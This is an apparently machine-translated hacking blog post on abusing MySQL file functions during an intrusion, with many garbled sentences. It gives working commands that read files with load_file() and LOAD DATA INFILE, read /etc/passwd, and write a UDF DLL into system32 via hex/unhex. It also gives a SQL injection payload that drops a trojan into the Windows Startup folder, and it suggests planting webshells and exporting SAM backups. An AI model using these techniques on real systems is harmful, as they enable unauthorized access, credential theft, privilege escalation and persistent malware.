Today a friend asked me how to in mysql read the file, the I asked, stunned, found himself still guilty of careless: the problem is, therefore, specially checked the mysql manual. The ideas are the same, in the have the file permissions of the premise, to read the file as a string into a table, then read out the data in the table, just in a slightly different way
Not sure mysql3. x can I use load_file()function I in mysql3 use manual not found, but it looks like is possible, use load data infile to read the file, the command is as follows
mysql>create table a (cmd text); mysql>load data infile 'c:\\boot.ini' into table a; mysql>select * from a;
mysql4. x In addition to the load data infile, you can also use the well-known load_file() to read, the command is as follows
mysql>create table a (cmd text); mysql>insert into a (cmd) values (load_file('c:\\boot.ini')); mysql>select * from a;
Under linux, mysql5. x In addition to the above two methods, can also use the system to directly execute a system command the way to read the file, is it necessary to root not sure, not tested, the command is as follows
mysql>system cat /etc/passwd
mysql reads the files in invasion are used when not more, may be used to query the configuration file to find the web path, or the webshell permissions very little time to read the other format of the webshell, and then with the into outfile is written the way Malaysia, binary files can also be so used, just hex()and unhex()step.
Example: free to killby the udf. dll files into the system directory
create table a (cmd LONGBLOB); insert into a (cmd) values (hex(load_file('c:\\windows\\temp\\udf.dll'))); SELECT unhex(cmd) FROM a INTO DUMPFILE 'c:\\windows\\system32\\udf.dll';
Other using the method are many, such as the Trojan file to write into the startup entry, or put processing through the cmd. exe file export to the system root directory, the sam backup export to a readable directory, and so on, the injection should be can also be used(in don't know the web path and can export files of the case), everyone is free to play.
Injection of the syntax, not the test
id=xxx and 1=2 union select 1,2,3,unhex(mm. exe hex),5 The INTO DUMPFILE 'C:\\Documents and Settings\\All Users\\"the beginning"菜单 \ 程序 \ 启动 \\mm.exe'/*